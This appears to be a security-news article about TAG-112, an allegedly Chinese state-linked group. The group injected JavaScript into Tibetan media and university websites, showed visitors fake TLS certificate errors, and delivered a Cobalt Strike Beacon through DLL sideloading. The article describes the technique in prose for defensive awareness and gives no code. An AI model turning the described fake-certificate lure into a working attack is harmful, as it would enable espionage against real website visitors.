HQ/EMEAFind out how we can help your business
An alleged Chinese state-sponsored threat group dubbed TAG-112 has infiltrated Tibetan media and university websites as part of a new cyber espionage campaign.
Reports revealed that this APT group conducted the attack to launch a Cobalt Strike post-exploitation toolset and harvest information while executing espionage. The researchers claimed that the attackers injected malicious JavaScript into these sites, spoofing a TLS certificate error to deceive visitors into downloading a disguised security certificate.
This malware, which threat actors frequently employ for remote access and post-exploitation, demonstrates a persistent prominence of cyber espionage against Tibetan entities.
TAG-112 is reportedly a sub-group of the notorious Evasive Panda cybercriminal organisation.
The investigation for this new cyber espionage campaign has been attributed to the TAG-112, which has been described as a possible sub-group of another cluster known as Evasive Panda. Researchers believe it strongly relates to the latter group as it has tactical overlaps and a history of targeting Tibetan entities.
However, these attacks have seemingly succeeded after allegedly compromising several Tibetan community websites, namely Tibet Post and Gyudmed Tantric University. Initial assessment of the hacked websites revealed that the attackers altered some of the sites’ features to request visitors download a malicious application disguised as a “security certificate” that, when executed, loaded a Cobalt Strike payload.
The JavaScript that enabled this is allegedly uploaded to the sites, most likely through a security flaw in their content management system, Joomla. Additionally, the malicious JavaScript is executed when the window .onload event occurs. It initially checks the user’s OS and web browser type, likely excluding non-Windows operating systems. This function will terminate the script if the attack process does not find Windows.
If the campaign lands on a Windows-based device, it will send its browser information to a remote server, which returns an HTML template that is a modified version of the respective browser’s TLS certificate error page. This page is typically displayed when there is an issue with the host’s TLS certificate.
In addition to showing the fake security certificate alert, the JavaScript initiates the download of a fictitious security certificate for the domain *.dnspod[.]cn. However, it is actually a legally signed executable that sideloads a Cobalt Strike Beacon payload via DLL sideloading.
Tibetan entities should be wary of these attacks as they are the primary focus of this new campaign. Therefore, organisations in this region should fortify their cybersecurity protocols to prevent or mitigate the impact of this malicious operation.
